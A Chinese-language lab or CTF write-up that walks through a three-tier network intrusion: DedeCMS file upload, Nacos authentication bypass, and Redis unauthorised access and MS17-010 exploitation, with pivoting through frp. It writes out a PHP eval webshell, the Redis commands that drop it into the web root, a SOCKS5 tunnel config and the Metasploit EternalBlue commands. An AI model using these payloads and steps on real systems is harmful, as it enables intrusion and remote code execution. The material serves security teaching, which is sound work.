三层网络渗透测试实战教学文档<\/h1>

1. DMZ区域渗透测试<\/h2>

1.1 信息收集阶段<\/h3>

网络扫描<\/strong><\/p>

使用ifconfig<\/code>确认攻击机与DMZ靶机连接的网段：192.168.50.0\/24<\/li>
使用nmap扫描发现目标：nmap -sS 192.168.50.0\/24<\/code><\/li>
发现192.168.50.128开放8080端口，确认为目标CMS平台<\/li> <\/ul> 目录扫描<\/strong><\/p> 使用dirsearch工具扫描网站目录：python3 dirsearch.py -u http:\/\/192.168.50.128:8080 -e *<\/code><\/li> 发现关键文件：管理后台地址：\/dede\/login.php<\/li> SQL相关文件：\/data\/sql.txt<\/li> <\/ul> <\/li> <\/ul> FTP信息获取<\/strong><\/p> 从sql.txt中发现FTP凭证：用户名：ftpuser<\/li> 密码：ftppass@123<\/li> <\/ul> <\/li> 连接FTP获取网站源码：ftp 192.168.50.128<\/code> → get dedecms.zip<\/code><\/li> <\/ul> 1.2 源码审计与漏洞利用<\/h3> 后台登录分析<\/strong><\/p> 分析\/dede\/login.php登录逻辑<\/li> 发现验证码机制，使用captcha-killer-modified插件绕过： GitHub地址：https:\/\/github.com\/f0ng\/captcha-killer-modified<\/li> 配置教程参考：https:\/\/blog.csdn.net\/weixin_72986003\/article\/details\/144359468<\/li> <\/ul> <\/li> 爆破成功获取管理员凭证：用户名：admin<\/li> 密码：admin123<\/li> <\/ul> <\/li> <\/ul> 文件上传漏洞利用<\/strong><\/p> 登录后台后，发现"附件管理"功能<\/li> 修改系统参数，添加允许上传的文件类型（如.php）<\/li> 直接上传Webshell： <?<\/span>php<\/span> @<\/span>eval<\/span>($_POST['cmd'<\/span>]);?><\/span> <\/span><\/span><\/span><\/code><\/pre><\/li> 使用蚁剑连接：http:\/\/192.168.50.128:8080\/uploads\/shell.php<\/li> <\/ol> 获取flag<\/strong><\/p> 在administrator桌面找到flag文件<\/li> flag值：flag{78477a738c06620b872421af357d2cd5}<\/code><\/li> <\/ul> 2. 二层设备区域渗透<\/h2> 2.1 内网信息收集<\/h3> 网络拓扑发现<\/strong><\/p> 在已控制的DMZ主机上执行：ipconfig \/all<\/code><\/li> 发现第二网卡信息：192.168.60.0\/24<\/li> <\/ul> 内网扫描<\/strong><\/p> 上传fscan工具到DMZ主机<\/li> 执行扫描：fscan -h 192.168.60.0\/24<\/code><\/li> 发现关键服务： 192.168.60.129:8848 - Nacos服务<\/li> 192.168.60.129:6379 - Redis服务<\/li> <\/ul> <\/li> <\/ul> 2.2 内网代理建立<\/h3> 使用frp建立隧道<\/strong><\/p> 攻击机配置frps.ini： [common]<\/span> <\/span><\/span>bind_port<\/span> =<\/span> 7000<\/span> <\/span><\/span><\/code><\/pre><\/li> 启动服务端：.\/frps -c frps.ini<\/code><\/li> DMZ主机配置frpc.ini： [common]<\/span> <\/span><\/span>server_addr<\/span> =<\/span> 192.168.50.1<\/span> <\/span><\/span>server_port<\/span> =<\/span> 7000<\/span> <\/span><\/span> <\/span><\/span>[socks5]<\/span> <\/span><\/span>type<\/span> =<\/span> tcp<\/span> <\/span><\/span>remote_port<\/span> =<\/span> 1080<\/span> <\/span><\/span>plugin<\/span> =<\/span> socks5<\/span> <\/span><\/span><\/code><\/pre><\/li> 启动客户端：.\/frpc -c frpc.ini<\/code><\/li> <\/ol> 配置代理工具<\/strong><\/p> 修改\/etc\/proxychains4.conf： socks5 192.168.50.1 1080 <\/code><\/pre> <\/li> <\/ul> 2.3 漏洞利用<\/h3> Nacos认证绕过<\/strong><\/p> 访问漏洞URL： http:\/\/192.168.60.129:8848\/nacos\/v1\/auth\/users?username=test&password=test <\/code><\/pre> <\/li> 使用POST方法创建管理员账户<\/li> 登录获取第一个flag<\/li> <\/ol> Redis未授权访问<\/strong><\/p> 使用获取的密码连接Redis： redis-cli -h 192.168.60.129 -a redispass<\/code><\/li> 写入Webshell： config set dir \/var\/www\/html config set dbfilename shell.php set x "<?php @eval($_POST['cmd']);?>" save <\/code><\/pre> <\/li> 使用蚁剑连接获取根目录flag<\/li> <\/ol> 3. 三层设备区域渗透<\/h2> 3.1 信息收集<\/h3> 上传扫描工具<\/strong><\/p> 将fscan上传至二层设备<\/li> 执行扫描：.\/fscan -h 192.168.70.0\/24<\/code><\/li> 发现MS17-010漏洞（永恒之蓝）<\/li> <\/ul> 3.2 漏洞利用<\/h3> 使用MSF进行攻击<\/strong><\/p> 启动msfconsole<\/li> 搜索漏洞模块： search ms17_010 use exploit\/windows\/smb\/ms17_010_eternalblue set RHOSTS 192.168.70.130 exploit <\/code><\/pre> <\/li> 注入payload获取meterpreter会话<\/li> <\/ol> 获取权限<\/strong><\/p> 漏洞利用会自动创建用户：用户名：hacker<\/li> 密码：P@ssw0rd<\/li> <\/ul> <\/li> 使用psexec.py连接： python3 psexec.py hacker:'P@ssw0rd'@192.168.70.130<\/code><\/li> <\/ul> 获取flag<\/strong><\/p> 在pro用户桌面找到flag文件<\/li> <\/ul> 4. 关键工具与资源<\/h2> 信息收集工具<\/strong>：<\/p> nmap<\/li> dirsearch<\/li> fscan (内网综合扫描工具)<\/li> <\/ul> <\/li> 漏洞利用工具<\/strong>：<\/p> captcha-killer-modified (验证码绕过)<\/li> frp (内网穿透)<\/li> Metasploit Framework<\/li> <\/ul> <\/li> Webshell管理<\/strong>：<\/p> 蚁剑(AntSword)<\/li> 冰蝎(Behinder)<\/li> <\/ul> <\/li> 参考资源<\/strong>：<\/p> Nacos认证绕过分析：https:\/\/blog.csdn.net\/weixin_51345872\/article\/details\/127066347<\/li> 验证码爆破教程：https:\/\/blog.csdn.net\/weixin_72986003\/article\/details\/144359468<\/li> <\/ul> <\/li> <\/ol> 5. 渗透测试流程图<\/h2> 开始 │ ├─ DMZ区域渗透 │ ├─ 信息收集(nmap, dirsearch) │ ├─ FTP凭证获取 │ ├─ 后台爆破(captcha-killer) │ ├─ 文件上传漏洞利用 │ └─ 获取flag │ ├─ 二层区域渗透 │ ├─ 内网扫描(fscan) │ ├─ 建立隧道(frp) │ ├─ Nacos漏洞利用 │ ├─ Redis漏洞利用 │ └─ 获取flag │ └─ 三层区域渗透 ├─ 扫描发现MS17-010 ├─ 永恒之蓝漏洞利用 └─ 获取flag 结束 <\/code><\/pre>